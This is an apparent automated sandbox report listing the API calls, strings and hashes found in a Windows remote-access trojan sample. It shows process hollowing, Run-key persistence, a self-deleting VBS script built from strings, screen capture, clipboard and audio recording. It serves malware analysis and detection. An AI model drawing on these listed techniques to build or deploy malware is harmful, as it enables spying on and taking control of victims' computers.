                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                              • String ID: p'E$JD
                                                              • API String ID: 1084509184-908320845
                                                              • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                              • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                              • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                              • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                              • String ID:
                                                              • API String ID: 2829624132-0
                                                              • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                              • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                              • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                              • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                              APIs
                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                              • String ID:
                                                              • API String ID: 1815803762-0
                                                              • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                              • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                              • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                              • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                              APIs
                                                              • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                              • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                              • CloseClipboard.USER32 ref: 0040B760
                                                              Similarity
                                                              • API ID: Clipboard$CloseDataOpen
                                                              • String ID:
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                              • String ID: JD
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: GetLocaleInfoEx
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                              Similarity
                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                              • String ID:
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                              • String ID:
                                                              APIs
                                                              • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              APIs
                                                                • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                              • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                              Similarity
                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                              • String ID:
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                              • String ID:
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              APIs
                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                              • DeleteDC.GDI32(00000000), ref: 00418F65
                                                              • DeleteDC.GDI32(00000000), ref: 00418F68
                                                              • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                              • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                              • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                              • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                              • DeleteObject.GDI32(?), ref: 00419027
                                                              • DeleteObject.GDI32(?), ref: 00419034
                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                              • DeleteDC.GDI32(?), ref: 004191B7
                                                              • DeleteDC.GDI32(00000000), ref: 004191BA
                                                              • DeleteObject.GDI32(00000000), ref: 004191BD
                                                              • GlobalFree.KERNEL32(?), ref: 004191C8
                                                              • DeleteObject.GDI32(00000000), ref: 0041927C
                                                              • GlobalFree.KERNEL32(?), ref: 00419283
                                                              • DeleteDC.GDI32(?), ref: 00419293
                                                              • DeleteDC.GDI32(00000000), ref: 0041929E
                                                              Similarity
                                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                              • String ID: DISPLAY
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                              • ResumeThread.KERNEL32(?), ref: 00418470
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                              • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                              • GetLastError.KERNEL32 ref: 004184B5
                                                              Similarity
                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                              APIs
                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                              • ExitProcess.KERNEL32 ref: 0040D80B
                                                              Similarity
                                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                              • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                              APIs
                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                              • ExitProcess.KERNEL32 ref: 0040D454
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                              • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                              • API String ID: 3797177996-2483056239
                                                              • Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                              • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                              • Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                              • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                              APIs
                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                              • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                              • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                              • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                              • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                              • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                              • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                              • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                              • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                              • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                              • API String ID: 2649220323-436679193
                                                              • Opcode ID: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                                              • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                              • Opcode Fuzzy Hash: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                                              • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                              APIs
                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                              • SetEvent.KERNEL32 ref: 0041B2AA
                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                              • CloseHandle.KERNEL32 ref: 0041B2CB
                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                              • API String ID: 738084811-2094122233
                                                              • Opcode ID: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                              • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                              • Opcode Fuzzy Hash: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                              • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                              • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                              • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                              • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Write$Create
                                                              • String ID: RIFF$WAVE$data$fmt
                                                              • API String ID: 1602526932-4212202414
                                                              • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                              • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                              • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                              • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000001,00407688,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                              • API String ID: 1646373207-3483908034
                                                              • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                              • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                              • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                              • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0040CE42
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                              • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                              • _wcslen.LIBCMT ref: 0040CF21
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                              • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000000,00000000), ref: 0040CFBF
                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                              • _wcslen.LIBCMT ref: 0040D001
                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                              • ExitProcess.KERNEL32 ref: 0040D09D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                              • String ID: 6$C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe$del$open
                                                              • API String ID: 1579085052-3059378046
                                                              • Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                              • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                              • Opcode Fuzzy Hash: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                              • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                              APIs
                                                              • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                              • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                              • lstrlenW.KERNEL32(?), ref: 0041C0F8
